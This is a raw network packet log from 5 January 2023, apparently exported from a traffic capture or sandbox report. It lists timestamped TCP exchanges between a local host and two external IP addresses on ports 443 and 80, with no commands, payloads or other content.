                                                                                                                                                                                    Jan 5, 2023 08:58:37.414324045 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.414349079 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.414382935 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.414391994 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.414417028 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.414438963 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.414469957 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.414515018 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.414524078 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.414535046 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.414555073 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.414578915 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.414618015 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.414627075 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.414647102 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.414653063 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.414707899 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.414714098 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.414725065 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.414777994 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.414814949 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.414843082 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.414879084 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.414887905 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.414910078 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.414918900 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.414953947 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.414978981 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.414988041 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.415020943 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.415040970 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.415070057 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.415115118 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.415127039 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.415138006 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.415143967 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.415177107 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.415201902 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.415211916 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.415241003 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.415277958 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.415306091 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.415338993 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.415348053 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.415369987 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.415383101 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.415414095 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.415446043 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.415455103 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.415467024 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.415472984 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.415499926 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.415534973 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.415544033 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.415555954 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.415627003 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.415658951 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.415692091 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.415700912 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.415712118 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.415734053 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.415757895 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.415802002 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.415811062 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.415824890 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.415832043 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.415869951 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.415899038 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.415908098 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.415929079 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.415951014 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.415956974 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.415982962 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.416012049 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.416019917 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.416047096 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.416069031 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.416102886 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.416143894 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.416152954 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.416179895 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.416186094 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.416214943 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.416281939 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.416289091 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.416306019 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.416332960 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.416354895 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.416388035 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.416395903 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.416419983 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.416439056 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.416445971 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.416460991 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.416471958 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.416492939 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.416524887 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.416544914 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.416609049 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.430263996 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.430294037 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.430346966 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.430387020 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.430541039 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.430589914 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.430718899 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.430738926 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.430811882 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.430824995 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.430872917 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.430922031 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.430933952 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.430984020 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.431106091 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.431137085 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.431159973 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.431174994 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.431193113 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.431199074 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.431241035 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.431251049 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.431262016 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.431329966 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.431340933 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.431376934 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.431436062 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.431466103 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.431489944 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.431503057 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.431516886 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.431539059 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.431570053 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.431601048 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.431627035 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.431638002 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.431657076 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.431663036 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.431673050 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.431684971 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.431716919 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.431718111 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.431740046 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.431749105 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.431771994 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.431797981 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.431818008 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.431904078 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.431927919 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.431953907 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.431965113 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.431984901 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.432037115 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.432075977 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.432094097 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.432106972 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.432125092 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.432132959 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.432156086 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.432189941 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.435794115 CET4975280192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:37.436853886 CET4975380192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:37.499639034 CET804975262.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.499702930 CET804975362.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.499759912 CET4975280192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:37.499820948 CET4975380192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:37.519522905 CET4975380192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:37.583266973 CET804975362.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.594223976 CET804975362.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.594305992 CET4975380192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:37.638725042 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.753633022 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.753669024 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.753696918 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.753750086 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.753782034 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.753783941 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.753809929 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.753916025 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.753964901 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.772696972 CET4975380192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:37.773884058 CET4975480192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:37.812216043 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.812252045 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.812282085 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.812350035 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.812375069 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.812391043 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.812403917 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.812433958 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.812469006 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.812474012 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.812486887 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.812508106 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.812553883 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.812558889 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.812572002 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.812611103 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.812622070 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.812638998 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.812650919 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.812666893 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.812768936 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.812771082 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.812783003 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.812815905 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.812872887 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.812958956 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:37.834362030 CET804975362.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.834510088 CET4975380192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:37.837666035 CET804975462.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.837821007 CET4975480192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:37.863229036 CET4975480192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:37.916971922 CET4975580192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:37.925260067 CET804975462.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.928706884 CET804975462.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.928783894 CET4975480192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:37.978308916 CET804975562.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:37.978471994 CET4975580192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:37.978656054 CET4975580192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:38.018719912 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:38.018832922 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:38.039829969 CET804975562.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:38.040169001 CET804975562.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:38.040298939 CET4975580192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:38.101630926 CET804975562.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:38.101756096 CET4975580192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:38.108021975 CET4975480192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:38.109292030 CET4975680192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:38.137573957 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:38.137605906 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:38.137634993 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:38.137706041 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:38.137720108 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:38.137738943 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:38.137758970 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:38.137769938 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:38.137794971 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:38.137856007 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:38.137881041 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:38.170301914 CET804975462.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:38.170363903 CET804975662.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:38.170463085 CET4975480192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:38.170505047 CET4975680192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:38.203464985 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:38.203511953 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:38.203546047 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:38.203643084 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:38.203670025 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:38.203721046 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:38.203752041 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:38.203805923 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:38.203805923 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:38.203805923 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:38.203805923 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:38.203838110 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:38.203871012 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:38.203902960 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:38.203986883 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:38.204035044 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:38.204071999 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:38.204125881 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:38.204127073 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:38.204127073 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:38.204127073 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:38.204127073 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:38.204127073 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:38.204127073 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:38.204127073 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:38.204173088 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:38.204225063 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:38.204232931 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:38.204242945 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:38.204260111 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:38.204282999 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:38.204292059 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:38.204310894 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:38.204330921 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:38.204389095 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:38.204483032 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:38.204514980 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:38.209553957 CET4975680192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:38.271864891 CET804975662.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:38.276823044 CET804975662.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:38.277062893 CET4975680192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:38.410716057 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:38.410790920 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:38.463433981 CET4975680192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:38.464529037 CET4975880192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:38.524760008 CET804975662.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:38.524859905 CET4975680192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:38.525391102 CET804975862.204.41.109192.168.2.4
